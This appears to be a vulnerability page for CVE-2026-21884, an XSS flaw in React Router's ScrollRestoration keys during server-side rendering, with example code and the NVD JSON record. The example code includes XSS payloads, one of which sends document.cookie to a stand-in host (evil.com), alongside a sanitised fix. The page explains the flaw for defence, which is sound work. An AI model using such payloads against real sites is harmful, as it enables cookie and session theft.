CVE-2026-21884

// Malicious payload for CVE-2026-21884 // Attackers can inject XSS via getKey or storageKey props // Example malicious ScrollRestoration usage: <ScrollRestoration getKey={(location) => { // Vulnerable: directly using untrusted location data return location.search; // attacker can inject: ?key=<img src=x onerror=alert(1)> }} /> // Server-side exploitation scenario: // 1. Attacker crafts URL: https://victim.com/page?key=<script>fetch('https://evil.com/steal?c='+document.cookie)</script> // 2. Server renders <ScrollRestoration getKey={() => location.search} /> // 3. Malicious script executes during SSR // Safe implementation example: import DOMPurify from 'dompurify'; <ScrollRestoration getKey={(location) => { // Sanitize untrusted input const safeKey = DOMPurify.sanitize(location.search, {RETURN_TRUSTED_TYPE: false}); return safeKey; }} />

{"cve": {"id": "CVE-2026-21884", "sourceIdentifier": "[email protected]", "published": "2026-01-10T03:15:48.673", "lastModified": "2026-01-30T18:19:22.727", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "React Router is a router for React. In @remix-run/react version prior to 2.17.3. and react-router 7.0.0 through 7.11.0, a XSS vulnerability exists in in React Router's <ScrollRestoration> API in Framework Mode when using the getKey/storageKey props during Server-Side Rendering which could allow arbitrary JavaScript execution during SSR if untrusted content is used to generate the keys. There is no impact if server-side rendering in Framework Mode is disabled, or if Declarative Mode (<BrowserRouter>) or Data Mode (createBrowserRouter/<RouterProvider>) is being used. This issue has been patched in @remix-run/react version 2.17.3 and react-router version 7.12.0."}, {"lang": "es", "value": "React Router es un router para React. En la versión de @remix-run/react anterior a la 2.17.3 y react-router de la 7.0.0 a la 7.11.0, existe una vulnerabilidad de XSS en la API de React Router en Modo Framework al usar las props getKey/storageKey durante la Renderización del Lado del Servidor, lo que podría permitir la ejecución arbitraria de JavaScript durante SSR si se utiliza contenido no confiable para generar las claves. No hay impacto si la renderización del lado del servidor en Modo Framework está deshabilitada, o si se está utilizando el Modo Declarativo () o el Modo de Datos (createBrowserRouter/). Este problema ha sido parcheado en la versión 2.17.3 de @remix-run/react y la versión 7.12.0 de react-router."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:L/A:N", "baseScore": 8.2, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "CHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 4.7}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-79"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:shopify:react-router:*:*:*:*:*:node.js:*:*", "versionStartIncluding": "7.0.0", "versionEndIncluding": "7.11.0", "matchCriteriaId": "6928DE33-6137-4682-8610-1A6646F1B2A5"}, {"vulnerable": true, "criteria": "cpe:2.3:a:shopify:remix-run\\/react:*:*:*:*:*:node.js:*:*", "versionEndExcluding": "2.17.3", "matchCriteriaId": "CD7006C4-2033-446C-A472-DAD51EB06396"}]}]}], "references": [{"url": "https://github.com/remix-run/react-router/security/advisories/GHSA-8v8x-cx79-35w7", "source": "[email protected]", "tags": ["Third Party Advisory"]}]}}